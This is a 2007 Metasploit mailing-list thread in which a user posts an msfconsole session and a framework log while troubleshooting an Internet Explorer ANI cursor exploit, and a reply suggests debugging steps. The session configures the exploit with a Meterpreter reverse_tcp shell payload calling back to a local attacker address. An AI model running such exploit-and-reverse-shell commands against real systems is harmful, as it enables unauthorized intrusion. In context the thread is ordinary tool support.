Metasploit mailing list archives
favicon.ico handler & meterpreter reverse_tcp encoder problems
From: jlbrown1980 at comcast.net (jlbrown1980)
Date: Mon, 14 May 2007 12:44:00 -0400
Alright here is my log and a screenshot with what is going on. This is what was entered into the attacking shell.. _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___) |_| =[ msf v3.1-dev + -- --=[ 192 exploits - 106 payloads + -- --=[ 17 encoders - 5 nops =[ 36 aux msf > use windows/browser/ani_loadimage_chunksize msf exploit(ani_loadimage_chunksize) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.105 LHOST => 192.168.1.105 msf exploit(ani_loadimage_chunksize) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 192.168.1.105 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH no The URI to use for this exploit (default Payload options: Name Current Setting Required Description ---- --------------- -------- ----------- DLL /usr/local/msf3/data/meterpreter/metsrv.dll yes The local pa EXITFUNC process yes Exit techni LHOST 192.168.1.105 yes The local ad LPORT 4444 yes The local po Exploit target: Id Name -- ---- 0 Automatic msf exploit(ani_loadimage_chunksize) > exploit [*] Started reverse handler [*] Using URL: http://192.168.1.105:8080/WGP0OVb7Z5YluSF [*] Server started. [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > This is the output in framwork.log with LogLevel set to 3 from start to finish. [05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Ppc::LongXor from /usr/local/msf3/modules/encoders/ppc/longxor.rb. [05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Ppc::LongXorTag from /usr/local/msf3/modules/encoders/ppc/longxor_tag.rb. [05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::Sparc::LongXorTag from /usr/local/msf3/modules/encoders/sparc/longxor_tag.rb. [05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::NonUpper from /usr/local/msf3/modules/encoders/x86/nonupper.rb. [05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::ShikataGaNai from /usr/local/msf3/modules/encoders/x86/shikata_ga_nai.rb. [05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AlphaUpper from /usr/local/msf3/modules/encoders/x86/alpha_upper.rb. [05/14/2007 12:26:17] [i(2)] core: Loaded encoder module Msf::Encoders::X86::FnstenvMov from /usr/local/msf3/modules/encoders/x86/fnstenv_mov.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::UnicodeUpper from /usr/local/msf3/modules/encoders/x86/unicode_upper.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::JmpCallAdditive from /usr/local/msf3/modules/encoders/x86/jmp_call_additive.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::Call4Dword from /usr/local/msf3/modules/encoders/x86/call4_dword_xor.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::NonAlpha from /usr/local/msf3/modules/encoders/x86/nonalpha.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AvoidUtf8 from /usr/local/msf3/modules/encoders/x86/avoid_utf8_tolower.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::UnicodeMixed from /usr/local/msf3/modules/encoders/x86/unicode_mixed.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::Countdown from /usr/local/msf3/modules/encoders/x86/countdown.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::X86::AlphaMixed from /usr/local/msf3/modules/encoders/x86/alpha_mixed.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::Generic::None from /usr/local/msf3/modules/encoders/generic/none.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded encoder module Msf::Encoders::Cmd::GenericSh from /usr/local/msf3/modules/encoders/cmd/generic_sh.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Ppc::Simple from /usr/local/msf3/modules/nops/ppc/simple.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Sparc::Vlad902 from /usr/local/msf3/modules/nops/sparc/random.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::X86::SingleByte from /usr/local/msf3/modules/nops/x86/single_byte.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::X86::Opty2 from /usr/local/msf3/modules/nops/x86/opty2.rb. [05/14/2007 12:26:18] [i(2)] core: Loaded nop module Msf::Nops::Php::Generic from /usr/local/msf3/modules/nops/php/generic.rb. [05/14/2007 12:26:31] [d(1)] core: Demand loading module encoder/windows/browser/ani_loadimage_chunksize. [05/14/2007 12:26:31] [d(1)] core: Demand loading module payload/windows/browser/ani_loadimage_chunksize. [05/14/2007 12:26:31] [d(1)] core: Demand loading module exploit/windows/browser/ani_loadimage_chunksize. [05/14/2007 12:26:31] [d(2)] core: Loading from file /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb [05/14/2007 12:26:31] [i(2)] core: Loaded exploit module Msf::Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 from /usr/local/msf3/modules/exploits/windows/browser/ani_loadimage_chunksize.rb. [05/14/2007 12:26:31] [d(1)] core: Demand loading module nop/windows/browser/ani_loadimage_chunksize. [05/14/2007 12:26:31] [d(1)] core: Demand loading module auxiliary/windows/browser/ani_loadimage_chunksize. [05/14/2007 12:26:45] [d(1)] core: Demand loading module encoder/windows/meterpreter/reverse_tcp. [05/14/2007 12:26:45] [d(1)] core: Demand loading module payload/windows/meterpreter/reverse_tcp. [05/14/2007 12:26:45] [d(2)] core: Loading from file /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb [05/14/2007 12:26:45] [i(2)] core: Loaded payload module Msf::Payloads::Stagers::Windows::ReverseTcp from /usr/local/msf3/modules/payloads/stagers/windows/reverse_tcp.rb. [05/14/2007 12:26:45] [d(2)] core: Loading from file /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb [05/14/2007 12:26:45] [i(2)] core: Loaded payload module Msf::Payloads::Stages::Windows::Meterpreter from /usr/local/msf3/modules/payloads/stages/windows/meterpreter.rb. [05/14/2007 12:26:45] [d(3)] core: Checking compat [ with ]: sockedi to sockedi [05/14/2007 12:26:45] [d(2)] core: Built staged payload windows/meterpreter/reverse_tcp. [05/14/2007 12:26:45] [w(3)] core: Missing value for payload offset LHOST, skipping. [05/14/2007 12:26:45] [d(1)] core: Demand loading module exploit/windows/meterpreter/reverse_tcp. [05/14/2007 12:26:45] [d(1)] core: Demand loading module nop/windows/meterpreter/reverse_tcp. [05/14/2007 12:26:45] [d(1)] core: Demand loading module auxiliary/windows/meterpreter/reverse_tcp. Screenshot of acitivity http://img385.imageshack.us/my.php?image=screenshotde0.png So that's where I'm at, still cant figure out why it's not loading the exploit properly.
Kurt Grutzmacher <grutz[at]jingojango.net> Wrote
It would probably be alot easier to SSH into your unix box from the
Windows platform. You'll not have to walk as often and then be able to troubleshoot tons faster.
Copy/paste your msfconsole session. Also do a "setg LogLevel 3", close and re-open msfconsole and run the explot again. Check ~/.msf/logs/framework.log for errors.
-- ..:[ grutz at jingojango dot net ]:.. GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4 "There's just no amusing way to say, 'I have a CISSP'."
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070514/987873f6/attachment.htm>
Current thread:
- favicon.ico handler & meterpreter reverse_tcp encoder problems jlbrown1980 (May 14)